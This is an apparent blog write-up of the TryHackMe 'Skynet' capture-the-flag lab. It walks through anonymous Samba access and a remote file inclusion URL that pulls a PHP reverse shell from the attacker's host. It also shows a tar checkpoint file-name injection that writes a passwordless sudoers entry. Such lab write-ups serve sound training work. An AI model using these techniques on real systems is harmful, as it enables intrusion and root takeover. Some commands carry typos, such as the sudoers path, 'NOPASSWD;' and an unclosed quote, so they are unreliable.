Terminator? I don't even know her! (Enter 90's laugh track here). No but seriously, the Skynet Try Hack Me CTF was so much fun and it was challenging, and so I had to write a write-up on it! When you're ready, put up your imaginary Terminator posters, and let's "get back" to it! 😆
Just a quick note before we start. If you run the IP address of your given machine in the browser, you are met with a "search engine" that does not work. I just wanted to get it out of the way before we start, because this page is useless and I don't want to leave you wondering.
Before we get crackalacking at Miles' emails, we need to do some basic enumeration. Let's start with an nmap scan to see what services are running on our open ports. Let's take note of our Samba smbd workgroup that is running, as this means we can exploit it via smbclient!
We can identify two important shares: milesdyson and anonymous. When we try to log in with milesdyson without a password/username we get an access denies status, yet, we can log in to anonymous this way.
smbclient //10.10.58.198/anonymous -U " "%" "
When we read the
attention.txt file from anonymous's share we can see that all users had to change their passwords. When we read the
logs we can see that it contains all the changed passwords! (Only log1.txt contains any data. Log2 and 3 have no data).
Copy the data from logs1.txt into a .txt file on your Desktop, or download it from smb and copy it. Then create a file named
users.txt in the same directory as your
log1.txt and insert one value into it: "Miles".
Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. The perpetrator’s goal is to exploit the referencing function in an application to upload malware (e.g., backdoor shells) from a remote URL located within a different domain.
Okay, let's get our reverse shell going. To make it easy for you, you can just open up your terminal and run the following command to pull one from Pentestmonkey's GitHub.
With our reverse-shell downloaded, we need to change two values: our IP address and our port. I keep my port at the default 1234, because I don't care. Change the IP address in your php-reverse-shell.php script to the IP address of your OPENVPN/attacker machine IP, not your lab's target machine. I did this via vim, but you can do it manually by naviagting to it if you want.
Now, go back to your browser and enter the following URL (replacing the IP's with your values).
http://<machine IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<OPENVPN IP>:8000/php-reverse-shell.php
This backup file gets a shell, navigates to the /var/www/html directory and creates a backup of everything in the directory. Read more on how we can exploit this on GTFOBins, but for now, I'm just going to show you.
echo 'echo "www-data ALL=(root) NOPASSWD; ALL" >> etc/sudoers' > sudo.sh
touch "/var/www/html/--checkpoint-action=exec=sh sudo.sh
Congratulations! You have successfully completed the Skynet CTF. I hope this was easy enough to follow, and that you had fun along the way. Until next time, happy hacking! 😊
Visit my GitHub for more.